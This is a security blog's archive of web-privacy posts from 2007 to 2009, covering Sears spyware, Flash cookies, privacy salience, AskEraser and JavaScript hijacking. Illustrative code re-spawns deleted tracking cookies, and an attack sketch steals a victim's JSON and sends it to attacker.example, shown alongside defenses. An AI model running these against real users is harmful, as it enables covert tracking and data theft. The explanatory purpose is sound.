Entries Tagged "web privacy"


Sears Spies on its Customers

It’s not just hackers who steal financial and medical information:

Between April 2007 and January 2008, visitors to the Kmart and Sears web sites were invited to join an “online community” for which they would be paid $10 with the idea they would be helping the company learn more about their customers. It turned out they learned a lot more than participants realized or that the feds thought was reasonable.

To join the “My SHC Community,” users downloaded software that ended up grabbing some members’ prescription information, emails, bank account data and purchases on other sites.

Reminds me of the 2005 Sony rootkit, which—oddly enough—is in the news again too:

After purchasing an Anastacia CD, the plaintiff played it on his computer, but his anti-virus software set off an alert saying the disc was infected with a rootkit. He went on to test the CD on three other computers. As a result, the plaintiff ended up losing valuable data.

Claiming for his losses, the plaintiff demanded 200 euros for 20 hours wasted dealing with the virus alerts and another 100 euros for 10 hours spent restoring lost data. Since the plaintiff was self-employed, he also claimed for loss of profits and in addition claimed 800 euros which he paid to a computer expert to repair his network after the infection. Added to this was 185 euros in legal costs making a total claim of around 1,500 euros.

The judge’s assessment was that the CD sold to the plaintiff was faulty, since he should be able to expect that the CD could play on his system without interfering with it.

The court ordered the retailer of the CD to pay damages of 1,200 euros.

Posted on September 24, 2009 at 6:37 AM

Flash Cookies

Flash has the equivalent of cookies, and they’re hard to delete:

Unlike traditional browser cookies, Flash cookies are relatively unknown to web users, and they are not controlled through the cookie privacy controls in a browser. That means even if a user thinks they have cleared their computer of tracking objects, they most likely have not.

What’s even sneakier?

Several services even use the surreptitious data storage to reinstate traditional cookies that a user deleted, which is called ‘re-spawning’ in homage to video games where zombies come back to life even after being “killed,” the report found. So even if a user gets rid of a website’s tracking cookie, that cookie’s unique ID will be assigned back to a new cookie again using the Flash data as the “backup.”
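To make re-spawning concrete, here is a minimal sketch of the logic in TypeScript. The `flashStore` bridge is hypothetical (real trackers used ActionScript’s SharedObject, exposed to page scripts through ExternalInterface), but the flow is the same: keep a backup copy of the tracking ID in Flash storage and quietly restore the browser cookie whenever it goes missing.

```typescript
// Hypothetical sketch of cookie "re-spawning" via a Flash Local Shared Object.
// `flashStore` stands in for a bridge into a hidden SWF (e.g. ExternalInterface
// wrapping ActionScript's SharedObject); it is not a real browser API.
interface FlashStore {
  get(key: string): string | null;
  set(key: string, value: string): void;
}
declare const flashStore: FlashStore; // assumed to be provided by the embedded SWF

function readCookie(name: string): string | null {
  const match = document.cookie.match(new RegExp(`(?:^|; )${name}=([^;]*)`));
  return match ? decodeURIComponent(match[1]) : null;
}

function respawnTrackingId(): string {
  let id = readCookie("uid");
  if (id === null) {
    // The browser cookie was deleted; restore it from the Flash "backup".
    id = flashStore.get("uid") ?? crypto.randomUUID();
    document.cookie = `uid=${encodeURIComponent(id)}; max-age=31536000; path=/`;
  }
  // Keep the Flash copy in sync, so deleting either store alone is useless.
  flashStore.set("uid", id);
  return id;
}
```

The practical consequence: clearing browser cookies alone accomplishes nothing, because the user would also have to find and delete the Flash Local Shared Object.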

Posted on August 17, 2009 at 6:36 AM

Privacy Salience and Social Networking Sites

Reassuring people about privacy makes them more, not less, concerned. It’s called “privacy salience,” and Leslie John, Alessandro Acquisti, and George Loewenstein—all at Carnegie Mellon University—demonstrated this in a series of clever experiments. In one, subjects completed an online survey consisting of a series of questions about their academic behavior—”Have you ever cheated on an exam?” for example. Half of the subjects were first required to sign a consent warning—designed to make privacy concerns more salient—while the other half did not. Also, subjects were randomly assigned to receive either a privacy confidentiality assurance, or no such assurance. When the privacy concern was made salient (through the consent warning), people reacted negatively to the subsequent confidentiality assurance and were less likely to reveal personal information.

In another experiment, subjects completed an online survey where they were asked a series of personal questions, such as “Have you ever tried cocaine?” Half of the subjects completed a frivolous-looking survey—”How BAD are U??”—with a picture of a cute devil. The other half completed the same survey with the title “Carnegie Mellon University Survey of Ethical Standards,” complete with a university seal and official privacy assurances. The results showed that people who were reminded about privacy were less likely to reveal personal information than those who were not.

Privacy salience does a lot to explain social networking sites and their attitudes towards privacy. From a business perspective, social networking sites don’t want their members to exercise their privacy rights very much. They want members to be comfortable disclosing a lot of data about themselves.

Joseph Bonneau and Soeren Preibusch of Cambridge University have been studying privacy on 45 popular social networking sites around the world. (You may not have realized that there are 45 popular social networking sites around the world.) They found that privacy settings were often confusing and hard to access; Facebook, with its 61 privacy settings, is the worst. To understand some of the settings, they had to create accounts with different settings so they could compare the results. Privacy tends to increase with the age and popularity of a site. General-use sites tend to have more privacy features than niche sites.

But their most interesting finding was that sites consistently hide any mentions of privacy. Their splash pages talk about connecting with friends, meeting new people, sharing pictures: the benefits of disclosing personal data.

These sites do talk about privacy, but only on hard-to-find privacy policy pages. There, the sites give strong reassurances about their privacy controls and the safety of data members choose to disclose on the site. There, the sites display third-party privacy seals and other icons designed to assuage any fears members have.

It’s the Carnegie Mellon experimental result in the real world. Users care about privacy, but don’t really think about it day to day. The social networking sites don’t want to remind users about privacy, even if they talk about it positively, because any reminder will result in users remembering their privacy fears and becoming more cautious about sharing personal data. But the sites also need to reassure those “privacy fundamentalists” for whom privacy is always salient, so they have very strong pro-privacy rhetoric for those who take the time to search them out. The two different marketing messages are for two different audiences.

Social networking sites are improving their privacy controls as a result of public pressure. At the same time, there is a counterbalancing business pressure to decrease privacy; watch what’s going on right now on Facebook, for example. Naively, we should expect companies to make their privacy policies clear to allow customers to make an informed choice. But the marketing need to reduce privacy salience will frustrate market solutions to improve privacy; sites would much rather obfuscate the issue than compete on it as a feature.

This essay originally appeared in the Guardian.

Posted on July 16, 2009 at 6:05 AM

Second SHB Workshop Liveblogging (6)

The first session of the morning was “Foundations,” which is kind of a catch-all for a variety of things that didn’t really fit anywhere else. Rachel Greenstadt moderated.

Terence Taylor, International Council for the Life Sciences (suggested video to watch: Darwinian Security; Natural Security), talked about the lessons evolution teaches about living with risk. Successful species didn’t survive by eliminating the risks of their environment; they survived by adaptation. Adaptation isn’t always what you think. For example, you could view the collapse of the Soviet Union as a failure to adapt, but you could also view it as successful adaptation. Risk is good. Risk is essential for the survival of a society, because risk-takers are the drivers of change. In the discussion phase, John Mueller pointed out a key difference between human and biological systems: humans tend to respond dramatically to anomalous events (the anthrax attacks), while biological systems respond to sustained change. And David Livingstone Smith asked about the difference between security adaptation and biological adaptation, which affects the reproductive success of an organism’s genes, even at the expense of the organism. (I recommend the book he edited: Natural Security: A Darwinian Approach to a Dangerous World.)

Andrew Odlyzko, University of Minnesota (suggested reading: Network Neutrality, Search Neutrality, and the Never-Ending Conflict between Efficiency and Fairness in Markets; Economics, Psychology, and Sociology of Security), discussed human-space vs. cyberspace. People cannot build secure systems—we know that—but people also cannot live with secure systems. We require a certain amount of flexibility in our systems. And finally, people don’t need secure systems. We survive with an astounding amount of insecurity in our world. The problem with cyberspace is that it was originally conceived as separate from the physical world, something that could correct for the inadequacies of the physical world. Really, the two are intertwined, and human space more often corrects for the inadequacies of cyberspace. Lessons: build messy systems, not clean ones; create a web of ties to other systems; create permanent records.

danah boyd, Microsoft Research (suggested reading: Taken Out of Context—American Teen Sociality in Networked Publics), does ethnographic studies of teens in cyberspace. Teens tend not to lie to their friends in cyberspace, but they lie to the system. From an early age, they’ve been taught that they need to lie online to be safe. Teens regularly share their passwords: with their parents when forced, or with their best friend or significant other. This is a way of demonstrating trust. It’s part of the social protocol for this generation. In general, teens don’t use social media in the same way as adults do. And when they grow up, they won’t use social media in the same way as today’s adults do. Teens view privacy in terms of control, and take their cues about privacy from celebrities and how they use social media. And their sense of privacy is much more nuanced and complicated. In the discussion phase, danah wasn’t sure whether the younger generation would be more or less susceptible to Internet scams than the rest of us—they’re not nearly as technically savvy as we might think they are. “The only thing that saves teenagers is fear of their parents”: teens try to lock their parents out, and lock others out in the process. Socio-economic status matters a lot, in ways that she is still trying to figure out. There are three different types of social networks: personal networks, articulated networks, and behavioral networks.

Mark Levine, Lancaster University (suggested reading: The Kindness of Crowds; Intra-group Regulation of Violence: Bystanders and the (De)-escalation of Violence), does social psychology. He argued against the common belief that groups are bad (mob violence, mass hysteria, peer group pressure). He collects data from UK CCTV cameras, searches it for aggressive behavior, and studies when and how bystanders either help escalate or de-escalate the situations. Results: as groups get bigger, there is no increase in anti-social acts and a significant increase in pro-social acts. He has much more analysis and results, too complicated to summarize here. One key finding: when a third party intervenes in an aggressive interaction, the situation is much more likely to de-escalate. Basically, groups can act against violence. “When it comes to violence (and security), group processes are part of the solution—not part of the problem.”

Jeff MacKie-Mason, University of Michigan (suggested reading: Humans are smart devices, but not programmable; Security when people matter; A Social Mechanism for Supporting Home Computer Security), is an economist: “Security problems are incentive problems.” He discussed motivation, and how to design systems to take motivation into account. Humans are smart devices; they can’t be programmed, but they can be influenced through the sciences of motivational behavior: microeconomics, game theory, social psychology, psychodynamics, and personality psychology. He gave a couple of general examples of how these theories can inform security system design.

Joe Bonneau, Cambridge University, talked about social networks like Facebook, and privacy. People misunderstand why privacy and security are important in social networking sites like Facebook. People underestimate what Facebook really is: a reimplementation of the entire Internet. “Everything on the Internet is becoming social,” and that makes security different. Phishing is different; 419-style scams are different. Social context makes some scams easier; social networks are fun, noisy, and unpredictable. “People use social networking systems with their brain turned off.” But social context can also be used to spot frauds and anomalies, and to establish trust.

Three more sessions to go. (I am enjoying liveblogging the event. It’s helping me focus and pay closer attention.)

Adam Shostack’s liveblogging is here. Ross Anderson’s liveblogging is in his blog post’s comments. Matt Blaze’s audio is here.

Posted on June 12, 2009 at 9:54 AM

An Expectation of Online Privacy

If your data is online, it is not private. Oh, maybe it seems private. Certainly, only you have access to your e-mail. Well, you and your ISP. And the sender’s ISP. And any backbone provider who happens to route that mail from the sender to you. And, if you read your personal mail from work, your company. And, if they have taps at the correct points, the NSA and any other sufficiently well-funded government intelligence organization—domestic and international.

You could encrypt your mail, of course, but few of us do that. Most of us now use webmail. The general problem is that, for the most part, your online data is not under your control. Cloud computing and software as a service only exacerbate this problem.

Your webmail is less under your control than it would be if you downloaded your mail to your computer. If you use Salesforce.com, you’re relying on that company to keep your data private. If you use Google Docs, you’re relying on Google. This is why the Electronic Privacy Information Center recently filed a complaint with the Federal Trade Commission: many of us are relying on Google’s security, but we don’t know what it is.

This is new. Twenty years ago, if someone wanted to look through your correspondence, he had to break into your house. Now, he can just break into your ISP. Ten years ago, your voicemail was on an answering machine in your office; now it’s on a computer owned by a telephone company. Your financial accounts are on remote websites protected only by passwords; your credit history is collected, stored, and sold by companies you don’t even know exist.

And more data is being generated. Lists of books you buy, as well as the books you look at, are stored in the computers of online booksellers. Your affinity card tells your supermarket what foods you like. What were cash transactions are now credit card transactions. What used to be an anonymous coin tossed into a toll booth is now an EZ Pass record of which highway you were on, and when. What used to be a face-to-face chat is now an e-mail, IM, or SMS conversation—or maybe a conversation inside Facebook.

Remember when Facebook recently changed its terms of service to take further control over your data? They can do that whenever they want, you know.

We have no choice but to trust these companies with our security and privacy, even though they have little incentive to protect them. None of ChoicePoint, LexisNexis, Bank of America, or T-Mobile bears the costs of privacy violations or any resultant identity theft.

This loss of control over our data has other effects, too. Our protections against police abuse have been severely watered down. The courts have ruled that the police can search your data without a warrant, as long as others hold that data. If the police want to read the e-mail on your computer, they need a warrant; but they don’t need one to read it from the backup tapes at your ISP.

This isn’t a technological problem; it’s a legal problem. The courts need to recognize that in the information age, virtual privacy and physical privacy don’t have the same boundaries. We should be able to control our own data, regardless of where it is stored. We should be able to make decisions about the security and privacy of that data, and have legal recourse should companies fail to honor those decisions. And just as the Supreme Court eventually ruled that tapping a telephone was a Fourth Amendment search, requiring a warrant—even though it occurred at the phone company switching office and not in the target’s home or office—the Supreme Court must recognize that reading personal e-mail at an ISP is no different.

This essay was originally published on the SearchSecurity.com website, as the second half of a point/counterpoint with Marcus Ranum.

Posted on May 5, 2009 at 6:06 AM

Online Age Verification

A discussion of a security trade-off:

Child-safety activists charge that some of the age-verification firms want to help Internet companies tailor ads for children. They say these firms are replacing one exaggerated threat—the menace of online sex predators—with a far more pervasive danger from online marketers like junk food and toy companies that will rush to advertise to children if they are told revealing details about the users.

It’s an old story: protecting against the rare and spectacular by making yourself more vulnerable to the common and pedestrian.

Posted on November 21, 2008 at 11:47 AM

Privacy Problems with AskEraser

Last week, Ask.com announced a feature called AskEraser (good description here), which erases a user’s search history. While it’s great to see companies using privacy features for competitive advantage, EPIC examined the feature and wrote to the company with some problems:

The first one is the fact that AskEraser uses an opt-out cookie. Cookies are bits of data left on a consumer’s computer that are used to authenticate the user and maintain information such as the user’s site preferences.

Usually, people concerned with privacy delete cookies, so creating an opt-out cookie is “counter-intuitive,” the letter states. Once the AskEraser opt-out cookie is deleted, the privacy setting is lost and the consumer’s search activity will be tracked. Why not have an opt-in cookie instead, the letter suggests.

The second problem is that Ask inserts the exact time that the user enables AskEraser and stores it in the cookie, which could make identifying the computer easier and enable third-party tracking if the cookie were transferred to such parties. The letter recommends using a session cookie that expires once the search result is returned.

Ask’s Frequently Asked Questions for the feature notes that there may be circumstances when Ask is required to comply with a court order and if asked to, it will retain the consumer’s search data even if AskEraser appears to be turned on. Ask should notify consumers when the feature has been disabled so that people are not misled into thinking their searches aren’t being tracked when they actually are, the letter said.
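To see why the opt-out design is backwards, here is a hypothetical sketch in TypeScript; the cookie names and logic are illustrative, not Ask.com’s actual implementation. With an opt-out cookie, the absence of the cookie—exactly the state a privacy-conscious user creates by clearing cookies—means “track me”; an opt-in design fails safe, and a fixed-value session cookie avoids storing an identifying timestamp at all.

```typescript
// Illustrative server-side logic only; the cookie names are hypothetical.

// Opt-out design (what EPIC criticized): no cookie means "track me."
// A user who clears all cookies silently loses the privacy setting.
function shouldTrackOptOut(cookies: Map<string, string>): boolean {
  return !cookies.has("askeraser_optout");
}

// Opt-in design: no cookie means "don't track." Clearing cookies fails safe.
function shouldTrackOptIn(cookies: Map<string, string>): boolean {
  return cookies.get("tracking_consent") === "yes";
}

// The letter's further suggestion, roughly: if a cookie is needed at all,
// make it a session cookie with a fixed value, so it carries no identifying
// timestamp that could help fingerprint the machine.
function eraserSessionCookieHeader(): string {
  // No Expires/Max-Age attribute: discarded when the browser session ends.
  return "Set-Cookie: askeraser=on; Path=/; HttpOnly";
}
```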

Here’s a copy of the letter, signed by eight privacy organizations. Still no word from Ask.com.

While I have your attention, I want to talk about EPIC. This is exactly the sort of thing the Electronic Privacy Information Center does best. Whether it’s search engine privacy, electronic voting, ID cards, or databases and data mining, EPIC is always at the forefront of these sorts of privacy issues. It’s the end of the year, and lots of people are looking for causes worthy of donation. Here’s EPIC’s donation page; they—well, “we” really, as I’m on the board—can use the support.

Posted on December 21, 2007 at 11:18 AM

JavaScript Hijacking

Interesting paper on JavaScript Hijacking: a new type of eavesdropping attack against Ajax-style Web applications. I’m pretty sure it’s the first type of attack that specifically targets Ajax code. The attack is possible because Web browsers don’t protect JavaScript the same way they protect HTML; if a Web application transfers confidential data using messages written in JavaScript, in some cases the messages can be read by an attacker.
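To illustrate the idea (my sketch, not code from the paper, and the hostnames are made up): if an authenticated endpoint returns private data as a bare JSON array, a hostile page could load it cross-site with a script tag, hook the Array constructor, and capture the data, because the browser attaches the victim’s cookies to the request. This constructor trick worked in JavaScript engines of that era; modern browsers no longer invoke an overridden Array constructor for array literals.

```typescript
// Historical sketch of the attacker's page script; victim.example and
// attacker.example are made-up hosts.
const stolen: unknown[] = [];

// Hook the Array constructor before the victim's data loads. In old engines,
// evaluating a JSON array literal as JavaScript invoked this hook.
(window as any).Array = function (...items: unknown[]) {
  stolen.push(...items);
  return items;
};

// Cross-site <script> include: the browser attaches the victim's session
// cookie, so the response contains the logged-in user's private data.
const tag = document.createElement("script");
tag.src = "https://victim.example/contacts.json"; // returns a bare JSON array
tag.onload = () => {
  // Exfiltrate whatever the hook captured to the attacker's server.
  new Image().src =
    "https://attacker.example/log?d=" +
    encodeURIComponent(JSON.stringify(stolen));
};
document.body.appendChild(tag);
```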

The authors show that many popular Ajax programming frameworks do nothing to prevent JavaScript hijacking. Some actually require a programmer to create a vulnerable server in order to function.

Like so many of these sorts of vulnerabilities, preventing this class of attacks is easy. In many cases, it requires just a few additional lines of code. And like so many software security problems, programmers need to understand the security implications of their work so that they can mitigate the risks they face. But my guess is that JavaScript hijacking won’t be solved so easily, because programmers don’t understand the security implications of their work and won’t prevent the attacks.
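As a sketch of the kind of fix involved (my own illustrative code, using a modern fetch-based client): serve JSON behind a prefix that makes it unexecutable as a script, and require a custom header that a cross-site script tag cannot set.

```typescript
// Illustrative defenses, not the paper's exact code.

// Server side: prepend an infinite loop, so evaluating the response as a
// <script> hangs instead of yielding data. (Framework plumbing is assumed.)
function guardedJsonBody(data: unknown): string {
  return "while(1);" + JSON.stringify(data);
}

// Server side: a <script> tag cannot attach custom headers, so requiring
// one blocks cross-site script inclusion outright.
function isLegitimateAjaxRequest(headers: Map<string, string>): boolean {
  return headers.get("x-requested-with") === "XMLHttpRequest";
}

// Client side: the cooperating caller sends the header and strips the
// prefix before parsing.
async function fetchGuardedJson(url: string): Promise<unknown> {
  const res = await fetch(url, {
    headers: { "X-Requested-With": "XMLHttpRequest" },
    credentials: "include",
  });
  const text = await res.text();
  return JSON.parse(text.replace(/^while\(1\);/, ""));
}
```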

Posted on April 2, 2007 at 3:45 PM
